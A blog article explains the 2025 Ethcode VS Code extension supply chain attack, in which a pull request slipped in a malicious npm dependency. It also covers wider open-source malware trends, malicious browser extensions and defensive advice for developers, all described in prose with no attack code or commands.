|

Malicious Pull Request Hits 6,000+ Developers: How the Ethcode VS Code Extension Became a Supply Chain Attack Target

ByInnoVirtuoso

What happens when your favorite developer tool turns into a cybersecurity nightmare overnight? If you use the Ethcode VS Code extension, you might have just dodged a digital bullet. In June 2025, a savvy but malicious actor exploited a surprising vulnerability—slipping dangerous code into a popular open-source project. Over 6,000 developers were at risk, and most never saw it coming.

This story isn’t just another cautionary tale. It’s a wake-up call about the growing threat of supply chain attacks targeting developer environments. Whether you’re an engineer, team lead, or just someone who relies on open-source tools, understanding what happened with Ethcode could help you avoid becoming the next victim.

Let’s dive into how a single pull request nearly turned a trusted VS Code extension into a Trojan horse, and what this means for the future of software supply chain security.

What Is Ethcode and Why Did It Matter?

Before we dissect the attack, let’s get our bearings.

Ethcode is a Visual Studio Code extension designed for Ethereum smart contract developers. Released in 2022 by user 7finney, Ethcode lets users deploy and execute Solidity contracts on Ethereum Virtual Machine (EVM)-based blockchains. For context, the EVM is the engine that powers smart contracts—the code that runs decentralized applications on Ethereum.

In short: If you build on Ethereum (or related blockchains), Ethcode is a handy tool.

  • Over 6,000 installations: While not as massive as some tools, that’s a significant user base—all developers working at the bleeding edge of blockchain tech.
  • Open-source: The code is public, collaborative, and frequently updated via GitHub, making it a prime target for attackers.

But why did Ethcode become such an attractive target? Here’s why that matters: developer tools, especially those used to manage code, contracts, and keys, are gateways to sensitive assets. Compromise one, and you compromise the whole workflow.

The Malicious Pull Request: Anatomy of a Supply Chain Attack

Let’s break down exactly how the attack unfolded.

The Setup: Dormant but Valuable

  • Last good update: September 2024. The project had been inactive for about nine months—a common pattern for open-source tools.
  • Enter the attacker: On June 17, 2025, a new GitHub user named Airez299 submitted a pull request (PR) with the innocuous message:
    “Modernize codebase with viem integration and testing framework.”

This sounded like exactly what the project needed. The PR claimed to modernize Ethcode, add a new testing framework, update dependencies, and remove outdated configurations.

The Hidden Threat: Two Malicious Lines in 4,000+ Changes

The attacker played it smart. They made 43 commits and changed roughly 4,000 lines of code. Buried in these updates were just two lines that spelled disaster:

  • The addition of an npm dependency, “keythereum-utils”, in package.json.
  • An import statement in src/extension.ts to pull in this dependency.

At first glance, these changes blended in with legitimate updates. But beneath the surface, they were the tip of a malware iceberg.

The Payload: Obfuscated JavaScript Goes to Work

So, what did “keythereum-utils” actually do?

  • Heavily obfuscated code: After reverse engineering, researchers found it would silently spawn a hidden PowerShell process.
  • Second-stage download: The PowerShell script would then fetch and run a batch file from a public file-hosting service.
  • Unknown payload: While the final purpose isn’t fully known, evidence suggests it could steal cryptocurrency assets, exfiltrate secrets, or poison smart contracts.

The npm package was downloaded 495 times before being taken down. The accounts used to upload it were fresh, single-use, and have since disappeared.

If you’re curious about the technical investigation, ReversingLabs provides a detailed breakdown here.

How the Attack Was Detected—and Stopped

The attack was sophisticated, but not invisible.

  • Responsible disclosure: Security researchers at ReversingLabs flagged the malicious pull request, analyzed the code, and reported their findings to Microsoft.
  • Marketplace removal: The extension was swiftly pulled from the VS Code Extensions Marketplace.
  • Cleanup: The Ethcode maintainers removed the malicious dependency, and Microsoft reinstated the extension after a thorough review.

This response provides a rare success story—many similar attacks go undetected for much longer.

Why Supply Chain Attacks Are Skyrocketing

Now, you might be wondering: “Is this just a fluke, or part of a bigger trend?” Unfortunately, it’s the latter.

The Bigger Picture: A Surge in Open-Source Malware

  • 16,279 pieces of open-source malware were discovered in Q2 2025—a 188% year-over-year increase.
    Source: Sonatype
  • Over 4,400 packages targeted credential and API token theft.
  • Data corruption malware doubled, with over 400 unique packages designed to damage files or sabotage infrastructure.

Why Is This Happening?

  • Trust in the open-source ecosystem: Developers often assume code on npm, PyPI, or GitHub is safe—especially when it’s widely used.
  • Automation: Attackers now use bots to create packages, set up accounts, and push malicious updates at scale.
  • Throwaway accounts: Just like Airez299, attackers spin up new identities specifically to inject malware into dormant or unguarded projects.

Let me put it simply:
As the world embraces open-source, attackers have realized it’s easier to compromise one package than to hack thousands of individual companies.

Well-Known Supply Chain Attackers: Lazarus Group and Yeshen-Asia

This isn’t just a random phenomenon. Notable threat actors have jumped on the bandwagon.

Lazarus Group (North Korea-Linked)

  • 107 malicious packages attributed to this advanced group, downloaded over 30,000 times.
  • Specializes in credential theft and espionage—often hitting developer tools and cryptocurrency projects.

Yeshen-Asia (China-Linked Cluster)

  • Over 90 npm packages associated with this cluster.
  • Active since December 2024, focused on harvesting system information and process lists.
  • Packages were published under distinct author accounts, each hosting only one malicious component—making detection harder.
  • Infrastructure was cleverly hidden behind Cloudflare-protected domains.

These campaigns are persistent, deliberate, and increasingly automated.
For a deeper look, check out Sonatype’s research on supply chain attacks.

Browser Extensions: The Next Frontier for Malicious Attacks

It’s not just code packages. Browser extensions—often trusted and granted broad permissions—are also in attackers’ crosshairs.

Recent Example: Fake Gaming Extensions in Firefox Add-ons Store

  • Eight fake extensions (e.g., “CalSyncMaster”, “VPN – Grab a Proxy – Free”, “Five Nights at Freddy’s”) were found with features ranging from adware to Google OAuth token theft.
  • Published by a single actor (“mre1903”), they:
  • Redirected users to gambling sites
  • Served fake virus alerts
  • Injected persistent tracking iframes
  • Hijacked shopping sessions for affiliate commissions

According to Socket’s research, this shows how quickly browser threats evolve—from simple scams to advanced credential and data theft.

How Can Developers and Teams Protect Themselves?

You might be thinking: “If even popular tools can be weaponized, is anything safe?”
Here’s the good news: Awareness is your first and best defense. Let’s talk actionable steps.

1. Scrutinize Pull Requests—Especially from New Contributors

  • Look for PRs from accounts with no history or activity.
  • Be wary of large, sweeping updates—especially after long dormancy.
  • Prioritize code reviews and require multiple maintainers to approve changes.

2. Monitor Dependencies Proactively

  • Use tools like Snyk, Socket, or npm audit to scan for known vulnerabilities and suspicious packages.
  • Avoid adding new dependencies without vetting their source, history, and maintainers.

3. Lock Down Publishing and Release Pipelines

  • Limit who can publish or merge updates in your repositories.
  • Implement two-factor authentication on npm, GitHub, and other platforms.
  • Set up automated alerts for new package versions or dependency changes.

4. Stay Informed and Educated

  • Follow reputable security blogs and advisories (KrebsOnSecurity, The Hacker News).
  • Encourage your team to share information about new threats and best practices.

5. Use Extension Sandboxing and Permissions

  • Only install browser or IDE extensions from trusted sources.
  • Regularly review and prune extensions. Remove anything you don’t need.
  • Pay attention to what permissions an extension requests—if it seems excessive, think twice before installing.

Real-World Lessons From the Ethcode Incident

Why does this attack matter so much? Here’s what the Ethcode incident teaches us:

  • No project is too small or obscure to be targeted.
  • Attackers are patient and subtle, willing to hide malicious code in the noise of legitimate updates.
  • Supply chain security is everyone’s responsibility—from maintainers to end-users.

It’s a stark reminder:
If you trust a tool enough to give it access to your code, your secrets, or your blockchain assets, you must also take steps to verify its integrity—every single time.

Frequently Asked Questions (FAQ)

What is a software supply chain attack?

A supply chain attack targets the tools, libraries, or infrastructure you use to build software—often by injecting malicious code into popular open-source packages or updates. Hackers compromise trusted sources, so when you install or update, you unwittingly install malware.

How did the attacker compromise Ethcode?

The attacker created a new GitHub account and submitted a pull request to the Ethcode repository, claiming to modernize the codebase. Buried in thousands of legitimate-looking changes were two lines that added and imported a malicious npm package, which then downloaded further malware.

Was my system compromised if I used Ethcode?

If you installed or updated Ethcode after June 17, 2025 and before the package was removed from the marketplace, your system could be at risk. Security researchers recommend running malware scans, reviewing recent activity, and changing any potentially exposed credentials.

What should I do if I think I installed a compromised extension or package?

  • Remove the extension immediately.
  • Run a full malware and antivirus scan.
  • Review recent system activity and look for unauthorized network connections or PowerShell activity.
  • Change credentials, keys, or tokens that may have been exposed.

How can I stay safe from similar attacks in the future?

  • Be vigilant about the software and extensions you use.
  • Regularly update and audit dependencies.
  • Enable security features like 2FA and code review requirements.
  • Use monitoring tools to keep an eye on changes and vulnerabilities.

Are browser extensions really that risky?

Yes—because they operate within your browser’s security context and often have access to sensitive data, from passwords to browsing history. Only install extensions from trusted vendors, and routinely audit what’s running in your browser.

Where can I learn more about recent supply chain threats?

Check out these authoritative sources: – ReversingLabs BlogSonatype Security ResearchSocket Security Blog

Final Takeaway: Stay Alert, Stay Secure

The Ethcode supply chain attack is more than a “one-off” event. It’s a powerful example of how trust in open-source—and the tools we rely on daily—can be turned against us with shocking speed and sophistication.

Here’s the actionable insight:
Make security a habit, not an afterthought. Scrutinize updates, review dependencies, and foster a culture of vigilance within your team or organization. In an era where supply chain attacks are the new normal, being proactive is the best way to protect your projects, your assets, and your peace of mind.

Want more insights on security and developer best practices? Subscribe to stay ahead of the threats—and keep building with confidence.

Discover more at InnoVirtuoso.com

I would love some feedback on my writing so if you have any, please don’t hesitate to leave a comment around here or in any platforms that is convenient for you.

For more on tech and other topics, explore InnoVirtuoso.com anytime. Subscribe to my newsletter and join our growing community—we’ll create something magical together. I promise, it’ll never be boring! 

Stay updated with the latest news—subscribe to our newsletter today!

Thank you all—wishing you an amazing day ahead!

Read more related Articles at InnoVirtuoso

InnoVirtuoso

Hello there! I'm passionate content writer navigating the digital landscape. With a deep love for words and an insatiable curiosity about technology.

With 10 years of experience in IT field, I write mostly about emerging tech, sharing news, informational articles and covering other topics I find interesting.

Let's craft the future of content together – one word at a time!

Browse InnoVirtuoso for more!

RondoDox Botnet: How Hackers Are Turning TBK DVRs and Four-Faith Routers into Stealthy DDoS Weapons
|

RondoDox Botnet: How Hackers Are Turning TBK DVRs and Four-Faith Routers into Stealthy DDoS Weapons

ByInnoVirtuoso

Imagine this: the security camera system you installed years ago in your retail store or warehouse—the one you rarely think about—has quietly become part of a global cyber army. Not for your benefit, but for hackers wielding a new, highly evasive botnet called RondoDox. This isn’t a scene from a sci-fi movie; it’s unfolding right…

Cybersecurity for Manufacturing in 2025: Protecting the Digital Factory Floor
|

Cybersecurity for Manufacturing in 2025: Protecting the Digital Factory Floor

ByInnoVirtuoso

The factory of the future isn’t a distant vision—it’s here right now. Walk into any manufacturing plant, and you’ll find a dizzying web of connected machines, smart sensors, and data-driven processes humming in perfect orchestration. But behind this cutting-edge efficiency lurks a sobering reality: manufacturing has become one of the world’s top targets for cyberattacks….

DoNot APT Expands Its Reach: LoptikMod Malware Targets European Foreign Ministries
|

DoNot APT Expands Its Reach: LoptikMod Malware Targets European Foreign Ministries

ByInnoVirtuoso

When a stealthy hacker group shifts its sights from familiar hunting grounds to the heart of European diplomacy, you know it’s time to pay attention. In 2024, cybersecurity experts sounded the alarm: an advanced persistent threat (APT) group known as DoNot Team—with roots in South Asia and possible ties to India—has ramped up operations, deploying…

Book Review & Deep Dive: Why “Cybersecurity Bible” is the Ultimate Guide for IT Security Mastery and Certification Success
|

Book Review & Deep Dive: Why “Cybersecurity Bible” is the Ultimate Guide for IT Security Mastery and Certification Success

ByInnoVirtuoso

Are you anxious about cybercriminals sneaking into your digital life—maybe stealing your identity, draining your bank account, or holding your business hostage? Or maybe you’re an aspiring IT professional, desperate to break into cybersecurity but lost in a jungle of technical jargon, boring textbooks, and outdated advice. If that sounds familiar, you’re not alone. The…

MOVEit Transfer Systems Targeted in Coordinated Global Attack Surge: What You Need to Know
|

MOVEit Transfer Systems Targeted in Coordinated Global Attack Surge: What You Need to Know

ByInnoVirtuoso

Cyber threats rarely make headlines unless something big is brewing—like a sudden, global spike in attacks on a widely trusted system. That’s exactly what’s happening right now with MOVEit Transfer systems, which have been hit by an unprecedented wave of scans and attempted exploits from over 100 unique IP addresses in a single day. The…

Is the CISO Role Now the Least Desirable Job in Business? Here’s What You Need to Know
|

Is the CISO Role Now the Least Desirable Job in Business? Here’s What You Need to Know

ByInnoVirtuoso

Picture this: You’re a senior leader with a seat just outside the boardroom. You’re responsible for warding off relentless cyber threats, ensuring compliance with a maze of regulations, and shouldering the weight of enterprise risk—all while lacking the authority to enforce real change. The phone never stops ringing. The pressure never lets up. And even…